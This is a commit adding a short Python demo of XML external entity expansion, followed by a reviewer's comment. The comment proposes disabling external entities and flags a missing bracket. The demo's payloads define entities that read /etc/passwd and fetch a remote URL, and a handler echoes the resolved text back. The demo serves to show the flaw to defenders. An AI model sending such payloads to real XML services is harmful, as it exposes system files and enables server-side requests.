Christian Heimes avatar Christian Heimes committed 82f4037

Add demo exploit for external entity expansion


Files changed (1)

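--- a/other/python-external.py
+++ b/other/python-external.py
@@ -0,0 +1,58 @@
+#!/usr/bin/python
+"""Demo exploit for external entity expansion
+"""
+import sys
+from xml.sax import ContentHandler
+from xml.sax import parseString
+
+xml_good = """<weather>Aachen</weather>"""
+
+xml_bad_file = """<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE weather [
+<!ENTITY passwd SYSTEM "file:///etc/passwd">
+]>
+<weather>&passwd;</weather>
+"""
+
+xml_bad_url = """<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE weather [
+<!ENTITY url SYSTEM "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
+]>
+<weather>&url;</weather>
+"""
+
+
+class WeatherHandler(ContentHandler):
+    def __init__(self):
+        ContentHandler.__init__(self)
+        self.tag = "unseen"
+        self.city = []
+
+    def startElement(self, name, attrs):
+        if name != "weather" or self.tag != "unseen":
+            raise ValueError(name)
+        self.tag = "processing"
+
+    def endElement(self, name):
+        self.tag = "seen"
+        self.city = "".join(self.city)
+
+    def characters(self, content):
+        if self.tag == "processing":
+           self.city.append(content)
+
+
+def weatherResponse(xml):
+    handler = WeatherHandler()
+    parseString(xml, handler)
+    if handler.city == "Aachen":
+        return "<weather>The weather in %s is terrible.</weather" % handler.city
+    else:
+        return "<error>Unknown city %s</error>" % handler.city[:500]
+
+for xml in (xml_good, xml_bad_file, xml_bad_url):
+    print("\nREQUEST:\n--------")
+    print(xml)
+    print("\nRESPONSE:\n---------")
+    print(weatherResponse(xml))
+    print("")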
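Review bot: The file shows only the unsafe path; nothing in other/python-external.py shows what a defender should change, and the lesson would land better with the safe call placed next to weatherResponse. parseString builds the parser with its defaults, so the safe variant constructs it explicitly and switches off external general entities before parsing, `parser = make_parser()` followed by `parser.setFeature(feature_external_ges, False)` (with `from xml.sax import make_parser` and `from xml.sax.handler import feature_external_ges`), then sets the content handler and calls parser.parse; if the script is meant to stay minimal, a one-line comment above the parseString call naming that feature would do. The error branch of weatherResponse returns up to 500 characters of whatever the entity resolved to, which is the channel the demo illustrates, so a comment there such as `# echoing the parsed text back is what exposes the resolved entity` makes that explicit. Separately, the success response is missing its closing angle bracket: `</weather` should be `</weather>`. As far as I know, newer CPython releases changed the xml.sax default so external general entities are not fetched, so on those versions the two bad inputs will likely print an empty city rather than the entity's contents; the module docstring should state which Python version the demo targets.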